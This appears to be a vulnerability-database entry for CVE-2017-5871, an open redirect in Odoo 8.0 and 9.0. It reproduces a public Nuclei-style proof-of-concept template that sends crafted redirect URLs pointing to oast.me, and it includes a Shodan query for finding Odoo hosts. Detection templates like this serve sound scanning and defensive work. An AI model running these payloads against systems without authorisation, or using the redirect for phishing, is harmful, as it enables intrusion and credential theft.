漏洞描述
An Open Redirect vulnerability in Odoo versions <= 8.0-20160726 and 9.0. This issue allows an attacker to redirect users to untrusted sites via a crafted URL.
CVE-2017-5871: Odoo <= 8.0-20160726 & 9.0 - Open Redirect
PoC代码[已公开]
id: CVE-2017-5871
info:
name: Odoo <= 8.0-20160726 & 9.0 - Open Redirect
author: 1337rokudenashi
severity: medium
description: |
An Open Redirect vulnerability in Odoo versions <= 8.0-20160726 and 9.0. This issue allows an attacker to redirect users to untrusted sites via a crafted URL.
impact: |
Successful exploitation can redirect users to malicious sites, potentially leading to phishing attacks or information theft.
remediation: |
Update Odoo to the latest patched version provided by the vendor.
reference:
- https://sysdream.com/cve-2017-5871-odoo-url-redirection-to/
- https://nvd.nist.gov/vuln/detail/CVE-2017-5871
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-5871
cwe-id: CWE-601
epss-score: 0.02676
epss-percentile: 0.85302
cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Odoo"
product: odoo
vendor: odoo
tags: cve2017,cve,odoo,redirect
http:
- method: GET
path:
- "{{BaseURL}}/web/session/logout?redirect=https://oast.me"
- "{{BaseURL}}/web/session/logout?redirect=https%3a%2f%2foast.me%2f"
- "{{BaseURL}}/web/dbredirect?redirect=https%3a%2f%2foast.me%2f"
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a0047304502204b58f1befd83ca762d040087fd29c2e1bf3b3da2b03889c16222d79db0441a10022100fe63738ba0da13761640899521f958347b4620ab3d2d86a88c8b9cd49f9b227a:922c64590222798bb761d5b6d8e72950